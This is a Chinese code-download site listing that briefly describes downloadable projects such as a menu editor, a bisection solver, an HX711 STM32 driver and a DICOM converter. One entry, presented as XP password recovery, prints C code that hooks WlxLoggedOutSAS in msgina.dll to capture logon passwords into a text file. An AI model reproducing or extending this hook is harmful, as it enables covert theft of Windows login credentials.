-
菜单编辑实例,可以实现文本文件的复制,剪切,粘贴,文字的字体设置等功能。...
菜单编辑实例,可以实现文本文件的复制,剪切,粘贴,文字的字体设置等功能。-Examples of Menu Editor, you can realize a text file copy, cut, paste, text font settings and other functions.
- 2022-10-07 03:00:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
to get information from remote directory
to get information from remote directory
- 2022-03-18 07:07:33下载
- 积分:1
-
二分法求方程的根,非常好的算法,自己编写的
二分法求方程的根,非常好的算法,自己编写的-Equation for the root of the dichotomy, very good algorithm, I have written
- 2022-05-20 18:52:25下载
- 积分:1
-
HX711称重传感器STM32驱动
使用STM32单片机读取称重模块HX711数据,读取的前两次数据不稳定,使用后4次数据做中位数排序处理。程序亲测可用
- 2022-05-13 01:07:17下载
- 积分:1
-
Windows2000 calc.exe 计算器 源代码
Windows2000 calc.exe 计算器 源代码-Windows2000 calc.exe Calculator source code
- 2022-01-25 15:53:41下载
- 积分:1
-
DICOM医学影像文件格式为BMP格式的源代码
医学影像文件DICOM格式转BMP格式源代码-DICOM medical imaging document format to BMP format source code
- 2022-03-20 17:00:59下载
- 积分:1
-
我用vc实现的Gouraud算法
我用vc实现的Gouraud算法-achieve shading algorithm
- 2022-08-12 07:46:04下载
- 积分:1
-
Manipulating Word Class
Is类的设计使开发人员可以生成复杂的word文档;
- 2023-05-14 11:45:03下载
- 积分:1
-
用vb做的不错的银行管理系统,功能很全的哦
用vb做的不错的银行管理系统,功能很全的哦-vb do with a good bank management system, the function was all oh
- 2023-05-02 14:10:02下载
- 积分:1